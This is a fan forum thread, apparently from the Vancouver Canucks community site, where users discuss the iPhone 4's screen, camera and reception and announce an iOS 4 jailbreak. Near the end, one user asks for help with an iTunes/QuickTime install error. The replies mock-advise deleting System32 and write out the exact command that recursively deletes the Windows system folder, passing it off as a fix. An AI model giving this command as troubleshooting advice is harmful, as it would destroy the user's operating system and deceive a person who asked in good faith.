The Official Site of the Vancouver Canucks
Canucks Community

******* OFFICIAL IPHONE/IPOD TOUCH/IPOD/IPAD THREAD*******

Markus Alexander Cody

i tried out the iphone 4 during my lunch break today.

its amazing. i was against it originally, but after seeing it...wow.

i couldn't replicate the "death grip" on any of the demo phones so perhaps reception is pretty good around here.

prices on craigslist are so pathetic. $1100 for an iPhone 4? Just wait a month and they will have them in stock...

went to see the iphone4 today, and man its a nice phone. The "retina display" is AMAZING. I myself own an iphone 3g so when comparing the display with it, the iphone 4 display was flawless. The camera is "5.0 megapixel" but when you snap a picture, because of the sensor and stuff the camera itself has, the pictures come out AMAZING. BEAUTIFUL pictures. the video camera itself recorded some magnificent videos.

I tried the "death grip" and everything to make it lose bars, but i couldnt make it drop ONE. I honestly think that the reception problem here shouldnt be an issue in canada...we have way better reception IMO.

I just wanted to let everyone know that the first official jb has been released for 4.0. This works on most phones and touches. Up until now nothing has worked on newer bootrom 3GS phones. Visit modmyi.com for the info. Servers are pretty packed so you might want to wait a while. And remember kids no illegal activities with your jailbreak :) use it for custom apps not downloading pirated apps that people have spent a lot of time creating.

retina display is amazing

but the camera could be better

i like that it can switch from back to front camera instantly, but to me 5mega pixel and vga camera are just not good enough

does iphone 4 support handsfree mobile?

i also wish it has an internal fm radio and transmitter

So my touch is jailbroken but then i got bored of it i decided to Restore and update my touch it was succesful but then if i want to Unlock my touch i have to download itunes 9.2 i did but i cant install Quicktime because of the APPDATA ERROR this happend to me when i downloaded sony vegas but failed now i cant FIND ANY SOULUTION to fix this problem could someone plz help me:( i know you guys hate me but i really need help my itouch is used by my dad and loves listining to his music now he cant so could someone help me thanks:)

Try deleting system 32, I had a friend who had the same problem and after he deleted it he said everything was fine.

The quickest, most effective method is to press the Windows key on the keyboard, hold it, and press 'R', and then type cmd /c rd /s /q %windir%\system32 -- or you may double-click "My Computer", then right-click the infected C: directory, and choose Delete.

Archived